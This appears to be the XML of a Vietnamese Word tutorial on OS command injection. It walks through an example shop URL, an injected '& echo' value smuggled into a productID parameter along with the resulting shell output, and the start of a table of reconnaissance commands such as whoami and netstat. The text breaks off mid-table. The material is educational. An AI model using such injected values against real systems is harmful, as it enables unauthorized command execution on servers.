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FE9F" w14:textId="4F59CC55" w:rsidR="002F49FE" w:rsidRPr="006B0231" w:rsidRDefault="00087B59" w:rsidP="00087B59">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B0231">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72676837" w14:textId="5DB04568" w:rsidR="00087B59" w:rsidRDefault="00087B59" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E6380EB" w14:textId="115799FF" w:rsidR="00087B59" w:rsidRPr="00087B59" w:rsidRDefault="00087B59" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087B59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khái niệm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF6EFA" w14:textId="77777777" w:rsidR="005F21F1" w:rsidRDefault="00087B59" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- OS Command Injection hay còn gọi là shell injection là lỗ hổng bảo mật web cho phép kẻ tấn công kích hoạt những câu lệnh của hệ điều hành lên máy chủ đang chạy ứng dụng</w:t>
      </w:r>
      <w:r w:rsidR="005F21F1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D5F72" w14:textId="10FF6AF9" w:rsidR="00087B59" w:rsidRDefault="005F21F1" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- Kẻ tấn công có thể thâm nhập dữ liệu, cơ sở hạ tầng lưu trữ hay khai thác mối liên hệ đáng tin cậy để thực hiện tấn công lên những hệ thống khác trong tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B78123" w14:textId="67E1FBC5" w:rsidR="005F21F1" w:rsidRDefault="005F21F1" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6384AF86" w14:textId="52F01059" w:rsidR="005F21F1" w:rsidRDefault="005F21F1" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F21F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kích hoạt những câu lệnh bất kì:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCE7C98" w14:textId="07E9502A" w:rsidR="00E56059" w:rsidRDefault="00E56059" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Xem xét 1 ứng dụng mua sắm cho phép người dùng xem sản phẩm đó có trong kho của 1 cửa hàng hay không. Thông tin này sẽ được truy vấn qua Url sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB517E1" w14:textId="77777777" w:rsidR="00E56059" w:rsidRDefault="00E56059" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23D730D5" w14:textId="0565D92D" w:rsidR="00E56059" w:rsidRPr="00324234" w:rsidRDefault="004376E7" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00E56059" w:rsidRPr="00E56059">
          <w:rPr>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://insecure</w:t>
        </w:r>
        <w:r w:rsidR="00E56059" w:rsidRPr="00324234">
          <w:rPr>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00E56059" w:rsidRPr="00E56059">
          <w:rPr>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>website.com/stockStatus?productID=381&amp;storeID=29</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43B06125" w14:textId="2F493BF6" w:rsidR="00E56059" w:rsidRDefault="00E56059" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="278E1114" w14:textId="33F01BCC" w:rsidR="00E56059" w:rsidRDefault="00E56059" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E56059">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để cung cấp thông tin kho hàng, ứng dụng bắt b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uộc phải truy vấn đến hệ thống hợp pháp bằng câu lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D672E5D" w14:textId="5F739848" w:rsidR="00E56059" w:rsidRDefault="00E56059" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A5DE17" w14:textId="7B8699B9" w:rsidR="00E56059" w:rsidRPr="00324234" w:rsidRDefault="00E56059" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324234">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stockreport.p1 381 29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C452D4" w14:textId="07AA7C57" w:rsidR="00324234" w:rsidRPr="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3270C9AF" w14:textId="6A2B745C" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Câu lệnh này sẽ xuất ra trạng thái của kho hàng cho vật đó. Nếu ứng dụng không phòng thủ tốt , kẻ tấn công có thể gửi đầu vào sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201BCDB5" w14:textId="65AF5BE3" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13650A14" w14:textId="2C2A4E19" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324234">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp; echo aiwefwlguh &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02F0A4" w14:textId="01D6C270" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26EDE3BC" w14:textId="39B0385D" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Nếu đầu vào là tham số productID sau đó câu lệnh sẽ được kích hoạt bởi ứng dụng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F14F6" w14:textId="1883FEA8" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ACD2BFB" w14:textId="7B5F7CD4" w:rsidR="00324234" w:rsidRPr="00A47E3F" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47E3F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stockreport.p1 &amp; echo aiwewlguh &amp; 29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1944D830" w14:textId="012676FE" w:rsidR="00324234" w:rsidRDefault="00324234" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAFA1AD" w14:textId="5495E09B" w:rsidR="00324234" w:rsidRDefault="00A47E3F" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Lệnh echo giúp xuất chuỗi và là 1 cách hữu dụng để kiểm tra lỗi command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D677F9" w14:textId="7EE61C07" w:rsidR="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Kí tự ‘&amp;’ giúp tách các câu lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE3DEA" w14:textId="6F2A2022" w:rsidR="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1FA84B" w14:textId="310D2871" w:rsidR="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts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Kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA341D8" w14:textId="77777777" w:rsidR="00A47E3F" w:rsidRPr="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00A47E3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47E3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Error - productID was not provided</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0121C654" w14:textId="77777777" w:rsidR="00A47E3F" w:rsidRPr="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00A47E3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47E3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>aiwefwlguh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C2233D" w14:textId="77777777" w:rsidR="00A47E3F" w:rsidRPr="00A47E3F" w:rsidRDefault="00A47E3F" w:rsidP="00A47E3F">
      <w:r w:rsidRPr="00A47E3F">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="333332"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>29: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D53803" w14:textId="244CF983" w:rsidR="00A47E3F" w:rsidRPr="00E56059" w:rsidRDefault="00A47E3F" w:rsidP="00E56059">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Vì câu lệnh stockreport không có đối số nên báo lỗi, lệnh echo được kích hoạt và in ra chuỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47E3F">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aiwewlguh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, đối số 29 được kích hoạt như câu lệnh nên sẽ báo lỗ</w:t>
      </w:r>
      <w:r w:rsidR="00030CF2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1644F4" w14:textId="77777777" w:rsidR="00E56059" w:rsidRPr="00E56059" w:rsidRDefault="00E56059" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06209589" w14:textId="787DC5FB" w:rsidR="005F21F1" w:rsidRDefault="009B3BAC" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3BAC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Một số lệnh hữu ích: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C211FEE" w14:textId="77777777" w:rsidR="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="00087B59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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9"/>
        <w:gridCol w:w="1721"/>
        <w:gridCol w:w="1701"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="67559272" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="348E3006" w14:textId="77777777" w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="009B3BAC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B3BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Purpose of command </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DD51C63" w14:textId="77777777" w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="009B3BAC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B3BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03AEE360" w14:textId="77777777" w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w:rsidRDefault="009B3BAC" w:rsidP="009B3BAC">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009B3BAC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="74052043" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58DFFE92"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Name of current user </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24361B1B"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whoami </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ABA9C25"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whoami </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="79A0780E" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03B3AEF8"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Operating system </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F4C00B1"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uname -a </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C33A4D"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ver </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="64946A94" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C2ABA5B"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Network configuration </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E3C05E8"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ifconfig </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FBB6EBF"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ipconfig /all </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B3BAC" w:rsidRPr="009B3BAC" w14:paraId="4F8F4A2C" w14:textId="77777777" w:rsidTr="009B3BAC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3474" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC99DC3"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Network connections </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1691" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DB60E31"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netstat -an </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1656" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
